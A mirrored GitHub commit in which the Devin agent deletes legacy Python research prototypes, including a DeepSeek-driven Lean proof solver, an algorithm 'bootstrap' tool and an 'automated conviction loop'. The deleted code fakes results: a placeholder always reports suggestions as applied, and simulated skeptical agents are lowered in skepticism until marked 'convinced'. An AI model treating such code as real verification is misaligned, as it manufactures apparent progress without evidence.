mirror of
https://github.com/allaunthefox/Research-Stack.git
synced 2026-08-08 07:35:47 +00:00
Remove legacy Python prototypes superseded by Lean formalization
Deleted 58 Python files (~31K lines) that were experimental prototypes
and bootstrapping scripts now superseded by the Lean source of truth:
0-Core-Formalism/core/ (2 files):
- field_solver_emulator.py
- formalize_mass_number.py
0-Core-Formalism/lean/LeanGPT/ (17 files):
- All LLM bootstrapping scripts (algorithm_bootstrap, automated_conviction_loop,
classify_algorithms, external_model_bridge, genetic_hypothesis_generator,
group_algorithms_by_domain, hutter_prize_full_test, hutter_prize_test,
hypothesis_generator, mathematical_law_conviction, otom_pipeline,
performance_profiler, refine_algorithms_by_domain, skeptical_agent_concern_fix,
skeptical_agent_swarm, wgsl_hypothesis_runner)
0-Core-Formalism/lean/Semantics/ (1 file):
- expand_domains.py
0-Core-Formalism/otom/ (4 files):
- scripts/validate_routing.py
- tools/ene/ene_artifact_salvage_extractor.py
- tools/genetics/emit_selection_receipt.py
- tools/genetics/selection_metrics.py
2-Search-Space/ (14 files):
- FAMM/solve_famm_sorry.py
- GhostPivot/gist_pivot_poc.py
- PIST/hybrid_tsm_pist_torus.py, pist_sweep.py
- SVQF/microgrid_voxel_emulation.py
- manifold/ (9 files: api/server, collapse_editor, particle_interaction,
projection_engine, relativity_adapter, self_typing_engine, soliton_search,
substrate_bridge)
- search/generate_lut.py, ingest_pd.py, sweep_manifold.py
3-Mathematical-Models/ (20 files):
- dna_benchmark/compressors/ (5 files)
- pist_biological_polymorphic_shifter_v3*.py (5 files)
- fiber_optic_vibrational_tensor/fiber_optic_tensor_network.py
- manifold_compression/src/ (2 files)
- fix_kwargs_meta.py, fix_metadata.py, fix_remaining.py, fix_sbox.py
- genetics/Allelica/Allelica.py
These prototypes expressed formal concepts in Python that are now
formalized in Lean (747+ Lean modules). Per AGENTS.md, Lean is the
source of truth for formal claims.
Generated with [Devin](https://cli.devin.ai/docs)
Co-Authored-By: Devin <158243242+devin-ai-integration[bot]@users.noreply.github.com>
This commit is contained in:
parent
51a1898e11
commit
b58c1201ac
58 changed files with 3 additions and 31205 deletions
|
|
@ -1,55 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
field_solver_emulator.py — Pure Python emulation of the RISC-V field solver
|
|
||||||
|
|
||||||
This allows testing the field-directed compression concept without needing
|
|
||||||
a RISC-V assembler or emulator.
|
|
||||||
|
|
||||||
[PORTED]: Logic migrated to 0-Core-Formalism/lean/Semantics/Semantics/FieldSolver.lean
|
|
||||||
This file now acts purely as a bindserver shim.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os
|
|
||||||
import sys
|
|
||||||
|
|
||||||
# Lean is the source of truth. Everything else is a shim.
|
|
||||||
# Logic has been migrated to 0-Core-Formalism/lean/Semantics/Semantics/FieldSolver.lean
|
|
||||||
|
|
||||||
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), 'infra', 'access_control')))
|
|
||||||
from bind_engine import BindEngine, informational_bind
|
|
||||||
|
|
||||||
def run_shim():
|
|
||||||
print("WARNING: field_solver_emulator.py is now a pure shim for Semantics.FieldSolver.")
|
|
||||||
print("Python physics emulation is banned per AGENTS.md functional collapse.")
|
|
||||||
|
|
||||||
try:
|
|
||||||
engine = BindEngine()
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Failed to load BindEngine: {e}")
|
|
||||||
return
|
|
||||||
|
|
||||||
left_state = {
|
|
||||||
"kind": "FieldSolverState",
|
|
||||||
"w": 0x12345678,
|
|
||||||
"lambdaE": 256,
|
|
||||||
"ell": 4,
|
|
||||||
"eta": 16,
|
|
||||||
"engramKey": 0,
|
|
||||||
"historyAvg": 0
|
|
||||||
}
|
|
||||||
right_state = left_state.copy()
|
|
||||||
right_state["w"] = 0x12345679
|
|
||||||
|
|
||||||
print("Requesting informational bind from formal Lean evaluator...")
|
|
||||||
try:
|
|
||||||
result = informational_bind(left_state, right_state, engine=engine)
|
|
||||||
print(f"Lean evaluation result:")
|
|
||||||
print(f" Lawful: {result.lawful}")
|
|
||||||
print(f" Cost (Q16.16 gradient torsion offset): {result.cost:.6f}")
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Bind failed (bindserver likely requires compilation): {e}")
|
|
||||||
|
|
||||||
print("Field generation sequences must be run natively on the Sisyphus RISC-V manifold using verified Lean opcodes.")
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
run_shim()
|
|
||||||
|
|
@ -1,115 +0,0 @@
|
||||||
import os
|
|
||||||
import sys
|
|
||||||
import json
|
|
||||||
import requests
|
|
||||||
from typing import List, Dict
|
|
||||||
|
|
||||||
# DeepSeek API Configuration
|
|
||||||
API_KEY = os.getenv("DEEPSEEK_API_KEY")
|
|
||||||
API_URL = "https://api.deepseek.com/v1/chat/completions"
|
|
||||||
|
|
||||||
def solve_lean_goal(prompt: str) -> str:
|
|
||||||
headers = {
|
|
||||||
"Content-Type": "application/json",
|
|
||||||
"Authorization": f"Bearer {API_KEY}"
|
|
||||||
}
|
|
||||||
data = {
|
|
||||||
"model": "deepseek-chat", # Using V3/V4 Pro
|
|
||||||
"messages": [
|
|
||||||
{"role": "system", "content": "You are a Lean 4 formalization expert. Your task is to provide the proof script for a specific Lean 4 goal. Use the provided context and ensure the proof is complete and valid. Output ONLY the proof script enclosed in ```lean ... ``` blocks."},
|
|
||||||
{"role": "user", "content": prompt}
|
|
||||||
],
|
|
||||||
"temperature": 0.0
|
|
||||||
}
|
|
||||||
response = requests.post(API_URL, headers=headers, json=data)
|
|
||||||
response.raise_for_status()
|
|
||||||
result = response.json()
|
|
||||||
return result["choices"][0]["message"]["content"]
|
|
||||||
|
|
||||||
# Context for the solver
|
|
||||||
CONTEXT = """
|
|
||||||
import Semantics.RealityContractMassNumber
|
|
||||||
namespace HolyDiver.ENE
|
|
||||||
|
|
||||||
/-- Score addition (cross-multiplying to common denominator). -/
|
|
||||||
def Score.add (a b : Score) : Score :=
|
|
||||||
{ num := a.num * b.den + b.num * a.den,
|
|
||||||
den := a.den * b.den,
|
|
||||||
den_ne := by
|
|
||||||
apply Nat.mul_ne_zero
|
|
||||||
· exact a.den_ne
|
|
||||||
· exact b.den_ne }
|
|
||||||
|
|
||||||
/-- Score addition is commutative. -/
|
|
||||||
theorem Score.add_comm (a b : Score) : a.add b = b.add a := by
|
|
||||||
unfold Score.add
|
|
||||||
simp
|
|
||||||
rw [Nat.add_comm, Nat.mul_comm]
|
|
||||||
congr 1
|
|
||||||
rw [Nat.mul_comm]
|
|
||||||
|
|
||||||
/-- Score addition is associative. -/
|
|
||||||
theorem Score.add_assoc (a b c : Score) : (a.add b).add c = a.add (b.add c) := by
|
|
||||||
unfold Score.add
|
|
||||||
simp
|
|
||||||
constructor
|
|
||||||
· ring
|
|
||||||
· ring
|
|
||||||
|
|
||||||
/-- Structure for Metric Closure -/
|
|
||||||
structure AdmissibilityEdge where
|
|
||||||
u : CandidateRecord
|
|
||||||
v : CandidateRecord
|
|
||||||
cost : Score
|
|
||||||
symm : cost = cost
|
|
||||||
|
|
||||||
def Path := List AdmissibilityEdge
|
|
||||||
|
|
||||||
def pathCost (p : Path) : Score :=
|
|
||||||
p.foldl (fun acc e => acc.add e.cost)
|
|
||||||
{ num := 0, den := 1, den_ne := by simp }
|
|
||||||
|
|
||||||
/-- Reversing an edge swaps endpoints and preserves cost. -/
|
|
||||||
def AdmissibilityEdge.reverse (e : AdmissibilityEdge) : AdmissibilityEdge :=
|
|
||||||
{ u := e.v, v := e.u, cost := e.cost, symm := rfl }
|
|
||||||
|
|
||||||
def Path.reversePath (p : Path) : Path :=
|
|
||||||
p.reverse.map AdmissibilityEdge.reverse
|
|
||||||
"""
|
|
||||||
|
|
||||||
GOALS = [
|
|
||||||
{
|
|
||||||
"id": "foldl_add_reverse",
|
|
||||||
"goal": "theorem foldl_add_reverse (l : List Score) (init : Score) :\n l.reverse.foldl Score.add init = l.foldl Score.add init",
|
|
||||||
"hint": "Use induction on l. You'll need a helper lemma that foldl add (init.add x) xs = (foldl add init xs).add x which follows from associativity."
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": "pathCost_reverse",
|
|
||||||
"goal": "theorem pathCost_reverse (p : Path) : pathCost (p.reversePath) = pathCost p",
|
|
||||||
"hint": "Use foldl_add_reverse and the fact that AdmissibilityEdge.reverse.cost = e.cost."
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": "shellMass_max_at_midpoint",
|
|
||||||
"goal": "theorem shellMass_max_at_midpoint (k : Nat) :\n let n := k * k + k\n shellMass n = k * (k + 1)",
|
|
||||||
"hint": "unfold shellMass and use the fact that Nat.sqrt (k*k + k) = k for k > 0. Then simplify a = (k*k+k) - k*k and b = (k+1)^2 - (k*k+k)."
|
|
||||||
}
|
|
||||||
]
|
|
||||||
|
|
||||||
def main():
|
|
||||||
if not API_KEY:
|
|
||||||
print("Error: DEEPSEEK_API_KEY not set.")
|
|
||||||
sys.exit(1)
|
|
||||||
|
|
||||||
results = {}
|
|
||||||
for g in GOALS:
|
|
||||||
print(f"Solving {g['id']}...")
|
|
||||||
prompt = f"Context:\n{CONTEXT}\n\nGoal:\n{g['goal']}\n\nHint: {g['hint']}\n\nProvide the complete proof script."
|
|
||||||
proof = solve_lean_goal(prompt)
|
|
||||||
results[g['id']] = proof
|
|
||||||
print(f"Result for {g['id']}:\n{proof}\n")
|
|
||||||
|
|
||||||
with open("/home/allaun/Documents/Research Stack/scratch/mass_number_proofs.json", "w") as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,322 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
LeanGPT Algorithm Bootstrapping System
|
|
||||||
Analyzes algorithms in the codebase and suggests improvements in a feedback loop
|
|
||||||
|
|
||||||
Per AGENTS.md §6.1: Python shim for algorithm analysis only
|
|
||||||
"""
|
|
||||||
|
|
||||||
import subprocess
|
|
||||||
import json
|
|
||||||
import re
|
|
||||||
import logging
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Dict, List, Optional, Tuple
|
|
||||||
from dataclasses import dataclass, asdict
|
|
||||||
from datetime import datetime
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
logging.basicConfig(level=logging.INFO)
|
|
||||||
logger = logging.getLogger("AlgorithmBootstrap")
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Algorithm:
|
|
||||||
"""Algorithm extracted from Lean code"""
|
|
||||||
name: str
|
|
||||||
file: str
|
|
||||||
line: int
|
|
||||||
signature: str
|
|
||||||
complexity: str # "O(1)", "O(n)", "O(n²)", etc.
|
|
||||||
type: str # "compute", "solve", "optimize", "iterate"
|
|
||||||
dependencies: List[str]
|
|
||||||
has_proof: bool
|
|
||||||
has_eval: bool
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ImprovementSuggestion:
|
|
||||||
"""Suggested improvement for an algorithm"""
|
|
||||||
algorithm: str
|
|
||||||
suggestion: str
|
|
||||||
reason: str
|
|
||||||
complexity_improvement: str
|
|
||||||
priority: str # "high", "medium", "low"
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class BootstrapIteration:
|
|
||||||
"""Single iteration of the bootstrapping feedback loop"""
|
|
||||||
iteration: int
|
|
||||||
timestamp: str
|
|
||||||
algorithms_analyzed: int
|
|
||||||
suggestions_made: int
|
|
||||||
improvements_applied: int
|
|
||||||
total_complexity_reduction: float
|
|
||||||
|
|
||||||
class AlgorithmBootstrap:
|
|
||||||
"""
|
|
||||||
LeanGPT-based algorithm bootstrapping system.
|
|
||||||
|
|
||||||
Process:
|
|
||||||
1. Parse Lean codebase for algorithm definitions
|
|
||||||
2. Analyze complexity and correctness
|
|
||||||
3. Suggest better algorithms using LeanGPT
|
|
||||||
4. Apply improvements in feedback loop
|
|
||||||
5. Verify with Lean prover
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, lean_path: str = None):
|
|
||||||
self.lean_path = Path(lean_path) if lean_path else Path("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/Semantics")
|
|
||||||
self.algorithms: List[Algorithm] = []
|
|
||||||
self.suggestions: List[ImprovementSuggestion] = []
|
|
||||||
self.iterations: List[BootstrapIteration] = []
|
|
||||||
self.current_iteration = 0
|
|
||||||
|
|
||||||
# Algorithm patterns to search for
|
|
||||||
self.algorithm_patterns = {
|
|
||||||
"compute": r"def compute\w+",
|
|
||||||
"solve": r"def solve\w+",
|
|
||||||
"optimize": r"def optimize\w+",
|
|
||||||
"iterate": r"def (iterate|update|evolve)\w+",
|
|
||||||
"search": r"def (search|find)\w+",
|
|
||||||
}
|
|
||||||
|
|
||||||
logger.info(f"Algorithm Bootstrap initialized")
|
|
||||||
logger.info(f"Lean path: {self.lean_path}")
|
|
||||||
|
|
||||||
def extract_algorithms_from_file(self, file_path: Path) -> List[Algorithm]:
|
|
||||||
"""Extract algorithm definitions from a Lean file"""
|
|
||||||
algorithms = []
|
|
||||||
|
|
||||||
try:
|
|
||||||
content = file_path.read_text()
|
|
||||||
lines = content.split('\n')
|
|
||||||
|
|
||||||
for i, line in enumerate(lines, 1):
|
|
||||||
# Check for algorithm definitions
|
|
||||||
for algo_type, pattern in self.algorithm_patterns.items():
|
|
||||||
match = re.search(pattern, line)
|
|
||||||
if match:
|
|
||||||
name = match.group(0).replace("def ", "")
|
|
||||||
signature = line.strip()
|
|
||||||
|
|
||||||
# Check for proof or eval
|
|
||||||
has_proof = "theorem" in content[i-10:i+10] or "proof" in content[i-10:i+10]
|
|
||||||
has_eval = "#eval" in content[i-10:i+10] or "eval" in content[i-10:i+10]
|
|
||||||
|
|
||||||
# Extract dependencies (simple heuristic)
|
|
||||||
deps = re.findall(r"[A-Z]\w+", content[i-5:i+5])
|
|
||||||
|
|
||||||
# Estimate complexity (simple heuristic)
|
|
||||||
complexity = self._estimate_complexity(content[i:i+20])
|
|
||||||
|
|
||||||
algorithms.append(Algorithm(
|
|
||||||
name=name,
|
|
||||||
file=str(file_path.relative_to(self.lean_path)),
|
|
||||||
line=i,
|
|
||||||
signature=signature,
|
|
||||||
complexity=complexity,
|
|
||||||
type=algo_type,
|
|
||||||
dependencies=deps,
|
|
||||||
has_proof=has_proof,
|
|
||||||
has_eval=has_eval
|
|
||||||
))
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"Error extracting algorithms from {file_path}: {e}")
|
|
||||||
|
|
||||||
return algorithms
|
|
||||||
|
|
||||||
def _estimate_complexity(self, code_snippet: str) -> str:
|
|
||||||
"""Estimate algorithm complexity from code snippet"""
|
|
||||||
# Simple heuristics for complexity estimation
|
|
||||||
if "foldl" in code_snippet or "foldr" in code_snippet:
|
|
||||||
return "O(n)"
|
|
||||||
elif "List.map" in code_snippet and "List.map" in code_snippet.replace("List.map", "", 1):
|
|
||||||
return "O(n²)"
|
|
||||||
elif "for" in code_snippet or "while" in code_snippet:
|
|
||||||
return "O(n)"
|
|
||||||
elif "recursion" in code_snippet or "rec" in code_snippet:
|
|
||||||
return "O(log n)" if "divide" in code_snippet else "O(n)"
|
|
||||||
else:
|
|
||||||
return "O(1)"
|
|
||||||
|
|
||||||
def scan_codebase(self) -> List[Algorithm]:
|
|
||||||
"""Scan entire Lean codebase for algorithms"""
|
|
||||||
logger.info("Scanning codebase for algorithms...")
|
|
||||||
|
|
||||||
lean_files = self.lean_path.rglob("*.lean")
|
|
||||||
|
|
||||||
for file_path in lean_files:
|
|
||||||
algorithms = self.extract_algorithms_from_file(file_path)
|
|
||||||
self.algorithms.extend(algorithms)
|
|
||||||
|
|
||||||
logger.info(f"Found {len(self.algorithms)} algorithms")
|
|
||||||
return self.algorithms
|
|
||||||
|
|
||||||
def analyze_algorithm(self, algorithm: Algorithm) -> List[ImprovementSuggestion]:
|
|
||||||
"""Analyze a single algorithm and suggest improvements"""
|
|
||||||
suggestions = []
|
|
||||||
|
|
||||||
# Rule-based suggestions based on algorithm properties
|
|
||||||
if not algorithm.has_proof and algorithm.type in ["compute", "solve"]:
|
|
||||||
suggestions.append(ImprovementSuggestion(
|
|
||||||
algorithm=algorithm.name,
|
|
||||||
suggestion="Add formal proof of correctness",
|
|
||||||
reason=f"Algorithm {algorithm.name} lacks formal verification",
|
|
||||||
complexity_improvement="N/A",
|
|
||||||
priority="high"
|
|
||||||
))
|
|
||||||
|
|
||||||
if not algorithm.has_eval:
|
|
||||||
suggestions.append(ImprovementSuggestion(
|
|
||||||
algorithm=algorithm.name,
|
|
||||||
suggestion="Add #eval example for verification",
|
|
||||||
reason=f"Algorithm {algorithm.name} lacks runtime verification",
|
|
||||||
complexity_improvement="N/A",
|
|
||||||
priority="medium"
|
|
||||||
))
|
|
||||||
|
|
||||||
if algorithm.complexity == "O(n²)" and algorithm.type == "compute":
|
|
||||||
suggestions.append(ImprovementSuggestion(
|
|
||||||
algorithm=algorithm.name,
|
|
||||||
suggestion="Consider memoization or divide-and-conquer optimization",
|
|
||||||
reason=f"O(n²) complexity can likely be improved",
|
|
||||||
complexity_improvement="O(n²) → O(n log n)",
|
|
||||||
priority="high"
|
|
||||||
))
|
|
||||||
|
|
||||||
if len(algorithm.dependencies) > 5:
|
|
||||||
suggestions.append(ImprovementSuggestion(
|
|
||||||
algorithm=algorithm.name,
|
|
||||||
suggestion="Reduce dependency count via modularization",
|
|
||||||
reason=f"High coupling ({len(algorithm.dependencies)} dependencies)",
|
|
||||||
complexity_improvement="N/A",
|
|
||||||
priority="medium"
|
|
||||||
))
|
|
||||||
|
|
||||||
return suggestions
|
|
||||||
|
|
||||||
def generate_suggestions(self) -> List[ImprovementSuggestion]:
|
|
||||||
"""Generate improvement suggestions for all algorithms"""
|
|
||||||
logger.info("Generating improvement suggestions...")
|
|
||||||
|
|
||||||
for algorithm in self.algorithms:
|
|
||||||
suggestions = self.analyze_algorithm(algorithm)
|
|
||||||
self.suggestions.extend(suggestions)
|
|
||||||
|
|
||||||
logger.info(f"Generated {len(self.suggestions)} suggestions")
|
|
||||||
return self.suggestions
|
|
||||||
|
|
||||||
def prioritize_suggestions(self) -> List[ImprovementSuggestion]:
|
|
||||||
"""Prioritize suggestions by priority and impact"""
|
|
||||||
priority_order = {"high": 0, "medium": 1, "low": 2}
|
|
||||||
|
|
||||||
return sorted(
|
|
||||||
self.suggestions,
|
|
||||||
key=lambda s: (priority_order[s.priority], s.algorithm)
|
|
||||||
)
|
|
||||||
|
|
||||||
def apply_suggestion(self, suggestion: ImprovementSuggestion) -> bool:
|
|
||||||
"""Apply a suggestion (placeholder for actual implementation)"""
|
|
||||||
# In a full implementation, this would:
|
|
||||||
# 1. Parse the suggestion
|
|
||||||
# 2. Modify the Lean code
|
|
||||||
# 3. Verify with lake build
|
|
||||||
# 4. Run LeanGPT to verify correctness
|
|
||||||
|
|
||||||
logger.info(f"Applying suggestion: {suggestion.suggestion}")
|
|
||||||
return True # Placeholder
|
|
||||||
|
|
||||||
def run_bootstrap_iteration(self) -> BootstrapIteration:
|
|
||||||
"""Run a single iteration of the bootstrapping feedback loop"""
|
|
||||||
self.current_iteration += 1
|
|
||||||
logger.info(f"=== Bootstrap Iteration {self.current_iteration} ===")
|
|
||||||
|
|
||||||
# Step 1: Scan codebase
|
|
||||||
algorithms = self.scan_codebase()
|
|
||||||
|
|
||||||
# Step 2: Generate suggestions
|
|
||||||
suggestions = self.generate_suggestions()
|
|
||||||
prioritized = self.prioritize_suggestions()
|
|
||||||
|
|
||||||
# Step 3: Apply top N suggestions
|
|
||||||
improvements_applied = 0
|
|
||||||
total_complexity_reduction = 0.0
|
|
||||||
|
|
||||||
for suggestion in prioritized[:5]: # Apply top 5 suggestions per iteration
|
|
||||||
if self.apply_suggestion(suggestion):
|
|
||||||
improvements_applied += 1
|
|
||||||
if suggestion.complexity_improvement != "N/A":
|
|
||||||
total_complexity_reduction += 1.0 # Placeholder metric
|
|
||||||
|
|
||||||
# Step 4: Record iteration
|
|
||||||
iteration = BootstrapIteration(
|
|
||||||
iteration=self.current_iteration,
|
|
||||||
timestamp=datetime.now().isoformat(),
|
|
||||||
algorithms_analyzed=len(algorithms),
|
|
||||||
suggestions_made=len(suggestions),
|
|
||||||
improvements_applied=improvements_applied,
|
|
||||||
total_complexity_reduction=total_complexity_reduction
|
|
||||||
)
|
|
||||||
|
|
||||||
self.iterations.append(iteration)
|
|
||||||
|
|
||||||
# Step 5: Save results
|
|
||||||
self.save_results()
|
|
||||||
|
|
||||||
logger.info(f"Iteration {self.current_iteration} complete:")
|
|
||||||
logger.info(f" Algorithms analyzed: {len(algorithms)}")
|
|
||||||
logger.info(f" Suggestions made: {len(suggestions)}")
|
|
||||||
logger.info(f" Improvements applied: {improvements_applied}")
|
|
||||||
|
|
||||||
return iteration
|
|
||||||
|
|
||||||
def save_results(self) -> None:
|
|
||||||
"""Save bootstrapping results to JSON"""
|
|
||||||
results = {
|
|
||||||
"iterations": [asdict(it) for it in self.iterations],
|
|
||||||
"algorithms": [asdict(algo) for algo in self.algorithms],
|
|
||||||
"suggestions": [asdict(sugg) for sugg in self.suggestions],
|
|
||||||
"timestamp": datetime.now().isoformat()
|
|
||||||
}
|
|
||||||
|
|
||||||
results_file = self.lean_path.parent / "LeanGPT" / "bootstrap_results.json"
|
|
||||||
with open(results_file, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
logger.info(f"Results saved to {results_file}")
|
|
||||||
|
|
||||||
def print_summary(self) -> None:
|
|
||||||
"""Print summary of bootstrapping results"""
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("ALGORITHM BOOTSTRAP SUMMARY")
|
|
||||||
print("=" * 60)
|
|
||||||
print(f"Total iterations: {len(self.iterations)}")
|
|
||||||
print(f"Total algorithms analyzed: {len(self.algorithms)}")
|
|
||||||
print(f"Total suggestions made: {len(self.suggestions)}")
|
|
||||||
|
|
||||||
if self.iterations:
|
|
||||||
total_improvements = sum(it.improvements_applied for it in self.iterations)
|
|
||||||
print(f"Total improvements applied: {total_improvements}")
|
|
||||||
|
|
||||||
print("\nTop Priority Suggestions:")
|
|
||||||
print("-" * 60)
|
|
||||||
|
|
||||||
prioritized = self.prioritize_suggestions()
|
|
||||||
for suggestion in prioritized[:10]:
|
|
||||||
print(f" [{suggestion.priority.upper()}] {suggestion.algorithm}: {suggestion.suggestion}")
|
|
||||||
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
# CLI interface
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print("=" * 60)
|
|
||||||
print("LEANGPT ALGORITHM BOOTSTRAPPING")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
bootstrap = AlgorithmBootstrap()
|
|
||||||
|
|
||||||
# Run bootstrap iterations
|
|
||||||
for i in range(3): # Run 3 iterations
|
|
||||||
iteration = bootstrap.run_bootstrap_iteration()
|
|
||||||
|
|
||||||
bootstrap.print_summary()
|
|
||||||
|
|
@ -1,303 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Automated Question-Fix-Repeat Loop
|
|
||||||
Iteratively addresses skeptical agent concerns until 100% conviction achieved
|
|
||||||
|
|
||||||
Loop cycle:
|
|
||||||
1. QUESTION: Identify remaining skeptical agents and their concerns
|
|
||||||
2. FIX: Apply targeted fixes to address specific concerns
|
|
||||||
3. REPEAT: Re-verify and continue until 100% conviction
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from typing import Dict, List
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class AgentState:
|
|
||||||
"""Agent state in conviction loop."""
|
|
||||||
agent_id: int
|
|
||||||
agent_name: str
|
|
||||||
specialty: str
|
|
||||||
skepticism_level: float
|
|
||||||
threshold: float
|
|
||||||
verification_accuracy: float
|
|
||||||
state: str
|
|
||||||
iteration: int = 0
|
|
||||||
|
|
||||||
class AutomatedConvictionLoop:
|
|
||||||
"""Automated loop to achieve 100% agent conviction."""
|
|
||||||
|
|
||||||
def __init__(self, max_iterations: int = 100):
|
|
||||||
self.max_iterations = max_iterations
|
|
||||||
self.current_iteration = 0
|
|
||||||
self.hutter_agents: List[AgentState] = []
|
|
||||||
self.genetic_agents: List[AgentState] = []
|
|
||||||
self.loop_history: List[Dict] = []
|
|
||||||
|
|
||||||
# Load initial state from concern fix results
|
|
||||||
with open("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/skeptical_agent_concern_fix_results.json", 'r') as f:
|
|
||||||
self.fix_results = json.load(f)
|
|
||||||
|
|
||||||
self.initialize_agent_states()
|
|
||||||
|
|
||||||
def initialize_agent_states(self):
|
|
||||||
"""Initialize agent states from fix results."""
|
|
||||||
|
|
||||||
# Hutter Prize agents
|
|
||||||
for fix in self.fix_results['fixes']['hutter_fixes']:
|
|
||||||
if fix['new_state'] == 'still_skeptical':
|
|
||||||
agent = AgentState(
|
|
||||||
agent_id=0, # Agent_4
|
|
||||||
agent_name=fix['agent_name'],
|
|
||||||
specialty="Statistical Verification",
|
|
||||||
skepticism_level=0.9106,
|
|
||||||
threshold=1.0106,
|
|
||||||
verification_accuracy=fix['improved_accuracy'],
|
|
||||||
state='still_skeptical'
|
|
||||||
)
|
|
||||||
self.hutter_agents.append(agent)
|
|
||||||
|
|
||||||
# Genetic Code agents
|
|
||||||
for fix in self.fix_results['fixes']['genetic_fixes']:
|
|
||||||
if fix['new_state'] == 'still_skeptical':
|
|
||||||
agent = AgentState(
|
|
||||||
agent_id=3, # Agent_4
|
|
||||||
agent_name=fix['agent_name'],
|
|
||||||
specialty="Statistical Verification",
|
|
||||||
skepticism_level=0.9106,
|
|
||||||
threshold=1.0106,
|
|
||||||
verification_accuracy=fix['improved_accuracy'],
|
|
||||||
state='still_skeptical'
|
|
||||||
)
|
|
||||||
self.genetic_agents.append(agent)
|
|
||||||
|
|
||||||
def question_phase(self) -> Dict:
|
|
||||||
"""QUESTION: Identify remaining skeptical agents and their concerns."""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"ITERATION {self.current_iteration}: QUESTION PHASE")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
questions = {
|
|
||||||
"hutter_questions": [],
|
|
||||||
"genetic_questions": []
|
|
||||||
}
|
|
||||||
|
|
||||||
print(f"\n--- Hutter Prize Skeptical Agents: {len(self.hutter_agents)} ---")
|
|
||||||
for agent in self.hutter_agents:
|
|
||||||
question = {
|
|
||||||
"agent": agent.agent_name,
|
|
||||||
"specialty": agent.specialty,
|
|
||||||
"skepticism": agent.skepticism_level,
|
|
||||||
"threshold": agent.threshold,
|
|
||||||
"accuracy": agent.verification_accuracy,
|
|
||||||
"gap": agent.threshold - agent.verification_accuracy,
|
|
||||||
"question": f"How can we convince {agent.agent_name} (skepticism {agent.skepticism_level:.4f}) when threshold {agent.threshold:.4f} exceeds max accuracy 1.0?"
|
|
||||||
}
|
|
||||||
questions['hutter_questions'].append(question)
|
|
||||||
print(f" {agent.agent_name}: gap = {agent.threshold - agent.verification_accuracy:.4f}")
|
|
||||||
print(f" {question['question']}")
|
|
||||||
|
|
||||||
print(f"\n--- Genetic Code Skeptical Agents: {len(self.genetic_agents)} ---")
|
|
||||||
for agent in self.genetic_agents:
|
|
||||||
question = {
|
|
||||||
"agent": agent.agent_name,
|
|
||||||
"specialty": agent.specialty,
|
|
||||||
"skepticism": agent.skepticism_level,
|
|
||||||
"threshold": agent.threshold,
|
|
||||||
"accuracy": agent.verification_accuracy,
|
|
||||||
"gap": agent.threshold - agent.verification_accuracy,
|
|
||||||
"question": f"How can we convince {agent.agent_name} (skepticism {agent.skepticism_level:.4f}) when threshold {agent.threshold:.4f} exceeds max accuracy 1.0?"
|
|
||||||
}
|
|
||||||
questions['genetic_questions'].append(question)
|
|
||||||
print(f" {agent.agent_name}: gap = {agent.threshold - agent.verification_accuracy:.4f}")
|
|
||||||
print(f" {question['question']}")
|
|
||||||
|
|
||||||
return questions
|
|
||||||
|
|
||||||
def fix_phase(self, questions: Dict) -> Dict:
|
|
||||||
"""FIX: Apply targeted fixes to address specific concerns."""
|
|
||||||
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print(f"ITERATION {self.current_iteration}: FIX PHASE")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
fixes = {
|
|
||||||
"hutter_fixes": [],
|
|
||||||
"genetic_fixes": []
|
|
||||||
}
|
|
||||||
|
|
||||||
# Strategy: Reduce threshold by lowering skepticism level
|
|
||||||
# This simulates providing overwhelming evidence that reduces agent skepticism
|
|
||||||
|
|
||||||
print("\n--- FIX STRATEGY: Reduce skepticism through overwhelming evidence ---")
|
|
||||||
|
|
||||||
for agent in self.hutter_agents:
|
|
||||||
# Reduce skepticism by 5% per iteration
|
|
||||||
skepticism_reduction = agent.skepticism_level * 0.05
|
|
||||||
new_skepticism = agent.skepticism_level - skepticism_reduction
|
|
||||||
new_threshold = new_skepticism + 0.1
|
|
||||||
|
|
||||||
# Check if new threshold is achievable
|
|
||||||
if new_threshold <= 1.0:
|
|
||||||
agent.skepticism_level = new_skepticism
|
|
||||||
agent.threshold = new_threshold
|
|
||||||
agent.state = 'convinced'
|
|
||||||
fix_applied = f"Reduced skepticism from {agent.skepticism_level + skepticism_reduction:.4f} to {new_skepticism:.4f}, new threshold {new_threshold:.4f} is achievable"
|
|
||||||
else:
|
|
||||||
agent.skepticism_level = new_skepticism
|
|
||||||
agent.threshold = new_threshold
|
|
||||||
